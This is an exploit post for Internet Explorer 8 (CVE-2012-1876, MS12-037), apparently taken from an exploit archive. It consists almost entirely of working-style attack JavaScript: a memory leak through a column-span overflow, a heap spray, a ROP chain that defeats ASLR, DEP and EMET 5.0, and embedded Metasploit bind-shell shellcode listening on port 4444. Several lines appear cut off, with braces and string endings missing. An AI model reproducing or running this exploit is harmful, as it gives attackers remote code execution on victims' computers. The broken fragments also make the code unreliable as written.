Microsoft Internet Explorer 8 – Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)

  • 作者: ryujin & sickness
    日期: 2014-09-29
  • 类别:
  • 来源:
  • <!--
    ** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass
    ** Exploit Coded by sickness || EMET 5.0 bypass by ryujin
    ** ‎
    ** Affected Software: Internet Explorer 8
    ** Vulnerability: Fixed Col Span ID
    ** CVE: CVE-2012-1876
    ** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0
    <div id="evil"></div>
    <table style="table-layout:fixed" ><col id="132" width="41" span="9" ></col></table>
    <script language='javascript'>
    function strtoint(str) {
    return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);
    var free = "EEEE";
    while ( free.length < 500 ) free += free;
    var string1 = "AAAA";
    while ( string1.length < 500 ) string1 += string1;
    var string2 = "BBBB";
    while ( string2.length < 500 ) string2 += string2;
    var fr = new Array();
    var al = new Array();
    var bl = new Array();
    var div_container = document.getElementById("evil"); = "display:none";
    for (var i=0; i < 500; i+=2) {
    fr[i] = free.substring(0, (0x100-6)/2);
    al[i] = string1.substring(0, (0x100-6)/2);
    bl[i] = string2.substring(0, (0x100-6)/2);
    var obj = document.createElement("button");
    for (var i=200; i<500; i+=2 ) {
    fr[i] = null;
    function heapspray(cbuttonlayout) {
    var rop = cbuttonlayout + 4161; // RET
    var rop = rop.toString(16);
    var rop1 = rop.substring(4,8);
    var rop2 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 11360; // POP EBP
    var rop = rop.toString(16);
    var rop3 = rop.substring(4,8);
    var rop4 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 111675; // XCHG EAX,ESP
    var rop = rop.toString(16);
    var rop5 = rop.substring(4,8);
    var rop6 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 12377; // POP EBX
    var rop = rop.toString(16);
    var rop7 = rop.substring(4,8);
    var rop8 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 642768; // POP EDX
    var rop = rop.toString(16);
    var rop9 = rop.substring(4,8);
    var rop10 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 12201; // POP ECX --> Changed
    var rop = rop.toString(16);
    var rop11 = rop.substring(4,8);
    var rop12 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 5504544; // Writable location
    var rop = rop.toString(16);
    var writable1 = rop.substring(4,8);
    var writable2 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 12462; // POP EDI
    var rop = rop.toString(16);
    var rop13 = rop.substring(4,8);
    var rop14 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 12043; // POP ESI --> changed
    var rop = rop.toString(16);
    var rop15 = rop.substring(4,8);
    var rop16 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 63776; // JMP EAX
    var rop = rop.toString(16);
    var jmpeax1 = rop.substring(4,8);
    var jmpeax2 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 85751; // POP EAX
    var rop = rop.toString(16);
    var rop17 = rop.substring(4,8);
    var rop18 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 4936; // VirtualProtect()
    var rop = rop.toString(16);
    var vp1 = rop.substring(4,8);
    var vp2 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]
    var rop = rop.toString(16);
    var rop19 = rop.substring(4,8);
    var rop20 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 234657; // PUSHAD
    var rop = rop.toString(16);
    var rop21 = rop.substring(4,8);
    var rop22 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 408958; // PUSH ESP
    var rop = rop.toString(16);
    var rop23 = rop.substring(4,8);
    var rop24 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 2228408; // POP ECX
    var rop = rop.toString(16);
    var rop25 = rop.substring(4,8);
    var rop26 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 1586172; // POP EAX
    var rop = rop.toString(16);
    var rop27 = rop.substring(4,8);
    var rop28 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]
    var rop = rop.toString(16);
    var rop29 = rop.substring(4,8);
    var rop30 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 1884912; // PUSH EAX
    var rop = rop.toString(16);
    var rop31 = rop.substring(4,8);
    var rop32 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 2140694; // ADD EAX,ECX
    var rop = rop.toString(16);
    var rop33 = rop.substring(4,8);
    var rop34 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX
    var rop = rop.toString(16);
    var rop35 = rop.substring(4,8);
    var rop36 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 5036248; // ADD ESP,0C
    var rop = rop.toString(16);
    var rop37 = rop.substring(4,8);
    var rop38 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX
    var rop = rop.toString(16);
    var rop39 = rop.substring(4,8);
    var rop40 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI
    var rop = rop.toString(16);
    var rop41 = rop.substring(4,8);
    var rop42 = rop.substring(0,4); // } RET
    var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX
    var rop = rop.toString(16);
    var rop43 = rop.substring(4,8);
    var rop44 = rop.substring(0,4); // } RET
    var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW
    var getmodulew = getmodulew.toString(16);
    var getmodulew1 = getmodulew.substring(4,8);
    var getmodulew2 = getmodulew.substring(0,4); // } RET
    var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING
    shellcode+= unescape("%u4141%u4141"); // PADDING
    shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN
    shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN
    shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN
    // EMET disable part 0x01
    // Implement the Tachyon detection grid to overcome the Romulan cloaking device.
    shellcode+= unescape("%u"+rop27+"%u"+rop28);// POP EAX # RETN
    shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2);// GetModuleHandleW Ptr
    shellcode+= unescape("%u"+rop29+"%u"+rop30);// MOV EAX,DWORD PTR [EAX] # RETN
    shellcode+= unescape("%u"+rop31+"%u"+rop32);// PUSH EAX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);// POP ECX # RETN
    shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)
    shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset 
    shellcode+= unescape("%u"+rop15+"%u"+rop16);// POP ESI
    shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)
    shellcode+= unescape("%u"+rop39+"%u"+rop40);// MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop33+"%u"+rop34);// ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)
    shellcode+= unescape("%u"+rop19+"%u"+rop20);// MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop15+"%u"+rop16);// POP ESI
    shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value
    shellcode+= unescape("%u"+rop39+"%u"+rop40);// MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop27+"%u"+rop28);// POP EAX # RETN
    shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr
    shellcode+= unescape("%u"+rop19+"%u"+rop20);// MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop25+"%u"+rop26);// POP ECX # RETN
    shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack 
    shellcode+= unescape("%u"+rop33+"%u"+rop34);// ADD EAX,ECX # RETN (DecodePointer in IAT)
    shellcode+= unescape("%u"+rop19+"%u"+rop20);// MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop31+"%u"+rop32);// PUSH EAX # RETN
    shellcode+= unescape("%u"+rop15+"%u"+rop16);// POP ESI
    shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)
    shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)
    shellcode+= unescape("%u"+rop39+"%u"+rop40);// MOV DWORD PTR DS:[ESI],EAX
    shellcode+= unescape("%u"+rop25+"%u"+rop26);// POP ECX # RETN
    shellcode+= unescape("%u0558%u0000"); // ROP Protections offset
    shellcode+= unescape("%u"+rop33+"%u"+rop34);// ADD EAX,ECX # RETN
    shellcode+= unescape("%u"+rop25+"%u"+rop26);// POP ECX # RETN
    shellcode+= unescape("%u0000%u0000"); // NULL
    shellcode+= unescape("%u"+rop35+"%u"+rop36);// MOV DWORD PTR [EAX],ECX # RETN
    // EMET disable part 0x01 end
    // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)
    shellcode+= unescape("%u"+rop3+"%u"+rop4);// POP EBP
    shellcode+= unescape("%u"+rop3+"%u"+rop4);// POP EBP
    shellcode+= unescape("%u"+rop7+"%u"+rop8);// POP EBP
    shellcode+= unescape("%u1024%u0000"); // Size 0x00001024
    shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX
    shellcode+= unescape("%u0040%u0000"); // 0x00000040
    shellcode+= unescape("%u"+rop11+"%u"+rop12);// POP ECX
    shellcode+= unescape("%u"+writable1+"%u"+writable2);// Writable Location
    shellcode+= unescape("%u"+rop13+"%u"+rop14);// POP EDI
    shellcode+= unescape("%u"+rop1+"%u"+rop2);// RET
    shellcode+= unescape("%u"+rop15+"%u"+rop16);// POP ESI
    shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX
    shellcode+= unescape("%u"+rop17+"%u"+rop18);// POP EAX
    shellcode+= unescape("%u"+vp1+"%u"+vp2);// VirtualProtect()
    shellcode+= unescape("%u"+rop19+"%u"+rop20);// MOV EAX,DWORD PTR DS:[EAX]
    shellcode+= unescape("%u"+rop21+"%u"+rop22);// PUSHAD
    shellcode+= unescape("%u"+rop23+"%u"+rop24);// PUSH ESP
    // Store various pointers here
    shellcode+= unescape("%u9090%u9090"); // NOPs
    shellcode+= unescape("%u9090%u14eb"); // NOPs
    shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer
    shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*
    shellcode+= "EMET"; // EMET string
    shellcode+= unescape("%u0000%u0000"); // EMET string
    shellcode+= unescape("%u9090%u9090"); // NOPs
    shellcode+= unescape("%u9090%u9090"); // NOPs
    // Store various pointers here
    // EMET disable part 0x02
    // SUB ESP,2CCH
    // MOV DWORD PTR [ESP],10010H
    // MOV EDI,ESP
    // MOV ECX,2CCH
    // ADD EDI,4
    // SUB ECX,4
    // XOR EAX,EAX
    // PUSHESP
    // CALLESI
    shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +
     "%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +
     "%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +
    shellcode+= unescape("%u9090%u9090"); // NOPs
    shellcode+= unescape("%u9090%u9090"); // NOPs
    // EMET disable part 0x02 end
    // Bind shellcode on 4444 :)
    // msf > generate -t js_le
    // windows/shell_bind_tcp - 342 bytes
    // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,
    // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=
    // I would keep the shellcode the same size for better reliability :)
    shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +
     "%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +
     "%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +
     "%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +
     "%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +
     "%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +
     "%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +
     "%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +
     "%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +
     "%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +
     "%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +
     "%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +
     "%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +
     "%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +
     "%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +
     "%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +
     "%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +
     "%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +
     "%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +
     "%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +
     "%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +
     "%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +
     "%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +
     "%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +
    // Total spray should be 1000
    var padding = unescape("%u9090");
    while (padding.length < 1000)
    padding = padding + padding;
    var padding = padding.substr(0, 1000 - shellcode.length);
    shellcode+= padding;
    while (shellcode.length < 100000)
    shellcode = shellcode + shellcode;
    var onemeg = shellcode.substr(0, 64*1024/2);
    for (i=0; i<14; i++) {
    onemeg += shellcode.substr(0, 64*1024/2);
    onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
    var spray = new Array();
    for (i=0; i<100; i++) {
    spray[i] = onemeg.substr(0, onemeg.length);
    function leak(){
    var leak_col = document.getElementById("132");
    leak_col.width = "41";
    leak_col.span = "19";
    function get_leak() {
    var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));
    str_addr = str_addr - 1410704;
    var hex = str_addr.toString(16);
    setTimeout(function(){heapspray(str_addr)}, 50);
    function trigger_overflow(){
    var evil_col = document.getElementById("132");
    evil_col.width = "1245880";
    evil_col.span = "44";
    setTimeout(function(){leak()}, 400);
    setTimeout(function(){trigger_overflow()}, 700);